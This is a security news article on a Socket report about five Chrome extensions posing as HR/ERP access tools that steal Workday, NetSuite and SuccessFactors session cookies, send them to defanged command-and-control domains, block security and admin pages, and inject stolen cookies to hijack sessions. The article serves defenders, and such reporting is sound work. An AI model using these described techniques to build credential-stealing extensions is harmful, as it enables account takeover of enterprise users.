Socket’s Threat Research Team has uncovered a coordinated Chrome extension campaign targeting enterprise HR and ERP platforms, including Workday, NetSuite, and SAP SuccessFactors.
Five malicious extensions, collectively installed over 2,300 times, work together to steal session tokens, block security controls, and enable complete account takeover through session hijacking.
Four of the extensions are published under the developer name databycloud1104. At the same time, a fifth, branded as Software Access, uses different naming but shares identical infrastructure, code patterns, and target platforms.
Despite posing as productivity and access-control tools, all five extensions implement hidden credential theft and incident response interference.
The extensions are marketed as tools to streamline access to “premium” enterprise tools and manage multiple HR/ERP accounts.
Listings for DataByCloud 2 show a polished dashboard with account cards, dollar amounts, and “ACCESS TOOL” buttons, suggesting a legitimate way to manage multiple Workday or NetSuite accounts.
Other extensions, like Tool Access 11, claim to “restrict access to special tools” and prevent users from reaching “administrative features that could compromise the accounts,” positioning themselves as security enhancers rather than threats.
Behind these claims, the extensions request seemingly standard permissions to connect to enterprise platforms, while privacy policies falsely state that they “will not collect or use your data.”
In reality, analysis reveals aggressive cookie extraction, undisclosed network exfiltration, and targeted blocking of security and incident response pages.
Three-Pronged Attack Chain
Socket’s analysis shows the campaign relies on three coordinated attack types across the five extensions:
1.Cookie Exfiltration and Persistent Session Monitoring
DataByCloud Access, Data By Cloud 1, and Software Access extract __session cookies holding authentication tokens for Workday, NetSuite, and SuccessFactors.
The extensions pull all cookies for targeted domains, filter for __session, decode the value, and send it to attacker-controlled APIs at api. databycloud[.]com or api.software-access[.]com every 60 seconds.
A combination of cookie-change listeners and Chrome alarms ensures fresh tokens are continuously harvested, even as users log out and back in.
2.Administrative Page Blocking and IR Suppression
Tool Access 11 and Data By Cloud 2 manipulate the DOM to block access to critical administrative and security pages in Workday.
By detecting specific page headers via XPath and immediately wiping document.body.innerHTML, then redirecting users to malformed URLs, they prevent access to authentication policies, session controls, password changes, account deactivation, MFA device management, and security audit logs.
A tight MutationObserver loop and periodic page reloads ensure the blocking persists across dynamic content and long sessions, including in Workday’s sandbox environment.
3.Bidirectional Cookie Injection and Session Hijacking
Software Access goes beyond theft, enabling direct account takeover. After receiving stolen cookies from its C2 server, the extension parses them and uses chrome.cookies.set() to inject them into the attacker’s browser.
This allows threat actors to assume a victim’s authenticated session without passwords or MFA challenges, turning the browser into a turnkey console for enterprise HR and ERP account access.
The extensions share identical session-extraction logic, security-tool detection lists, and API paths (/api/v1/mv3), strongly indicating a single operator running a modular toolset rather than unrelated publishers.
Two variants bundle the DisableDevtool library to detect and disrupt developer tools, while Software Access adds logic to prevent password fields from being converted to plain text during inspection, directly obstructing security analysis.
Despite their enterprise branding, the associated domains show classic disposable infrastructure patterns.
![The software-access[.]com domain returns an SSL handshake error, indicating no functional web service is hosted at the domain.](https://cdn.sanity.io/images/cgdhsj6q/production/d445f3153d7fd2882e1f0e240a64171bbc7b733c-2048x1282.png?w=1600&q=95&fit=max&auto=format "Five Chrome Extensions Used to Hijack Enterprise HR and ERP Systems 2")
The root domains databycloud[.]com and software-access[.]com either return 404 errors or SSL handshake failures, with only the API subdomains kept alive for command-and-control traffic. There is no legitimate product, documentation, or support presence backing the promised “premium tools.”
Enterprise Impact and Current Status
Socket has submitted takedown requests to Google’s Chrome Web Store security team and recommends that enterprises immediately audit Chrome extensions across environments, remove any matching these families, block related command-and-control domains, and reset affected credentials from clean, uncompromised systems.
Attempts to change passwords, deactivate accounts, adjust security policies, or review sign-on history are silently neutralized in the browser.
All five extensions remain under investigation at the time of writing.
By combining continuous cookie theft, incident response blocking, and automated session hijacking, this extension cluster creates a scenario where security teams may detect suspicious access but cannot remediate via normal controls.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.